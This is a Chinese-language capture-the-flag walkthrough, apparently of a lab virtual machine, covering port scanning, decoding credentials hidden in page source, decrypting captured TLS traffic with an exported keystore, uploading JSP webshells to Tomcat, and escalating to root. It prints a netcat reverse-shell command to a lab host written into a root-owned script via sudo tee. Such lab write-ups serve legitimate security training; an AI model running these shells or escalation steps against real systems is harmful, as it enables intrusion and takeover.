1.nmap扫描ip靶机端口


2.进入首页http://192.168.110.140/

3.查看页面源代码 发现

两次base64解密<!------pgibbons:damnitfeelgoodtobeaganggoodtobeaganggoodtobeagangta ----->
这个可能是某个地方的账号密码 (先记下来)
4.点击主页图片 再进入

5.发现一个登陆界面 用刚才的密码登录

6.点击各个功能点 发现邮件里有一个keystore的文件,点击下载

7.继续浏览功能点发现一个按钮,点击此链接

8.发现一个pcap流量包,点击下载 同时观察页面发现重要信息密码都是tomcat

9.把第一个下载的文件kerstore放到根目录,进入java/jre
将keystore放到C盘根目录,查看keystore这个密钥库里面的所有证书
keytool -list -keystore c:\keystore 输入密钥库口令tomcat:
从密钥库导出.p12证书,将keystore拷贝到keytool目录,导出名为:tomcatkeystore.p12的证书,命令:
keytool -importkeystore -srckeystore c:\keystore -destkeystore c:\tomcatkeystore.p12 -deststoretype PKCS12
-srcalias tomcat



10.将导出的证书导入wireshare
导入流量包


在流量包里找到后台地址

账号密码流量包

11.访问后台,解密后得tomcat:Tt\5D8F(#!*u=G)4m7zB
由于该地址的证书不安全,所以需要开启burpsuite,经过代理可以添加安全例外

传完马的位置 192.168.110.140:8443/压缩包的名字/木马名字.jsp

发现的问题:上传的菜刀马,一会儿就会消失,文件被删除,需要重新上传war包才能够继续使用菜刀,主机可能有杀软或者杀web shell工具。解决方法:bash反弹一个shell出来。
11.制作msf5马

配置msf5准备监听

将木马上传到服务器,访问木马,反弹到shell

反弹终端


收集主机信息

查看用户的密码,发现两个用户

进入数据库,好像不用密码

查看数据库中的内容

得到密码:thelaststraw
登陆用户milton


但是有个图片文件,联想到blumbergh用户下应该也有图片
进不去,但是在前面的时候有个gif的图片

将下载好的图片打包
打印图片中的可打印字符,追加输出到image.txt

提权成功

查看历史命令

查看用户权限

查看权限发现/usr/share/cleanup/tidyup.sh只有root可写

可以用root权限运行tee命令

那么用tee命令写tidyup.sh:先将反弹shell命令写入shell.txt文件,使用bash反弹shell命令没有成功,于是使用nc命令反弹shell成功,所以写nc反弹命令
echo “nc -e /bin/bash 192.168.110.128 8989” > shell.txt
用tee命令将shell.txt内容输出到tidyup.sh
cat shell.txt | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh
查看是够写入成功
cat /usr/share/cleanup/tidyup.sh
开启监听

成功 用id命令查看权限
用命令python -c 'import pty;pty.spawn("/bin/bash")'得到交互页面

将图片挪到home目录下

上传大马

拿到flag

4082

被折叠的 条评论
为什么被折叠?



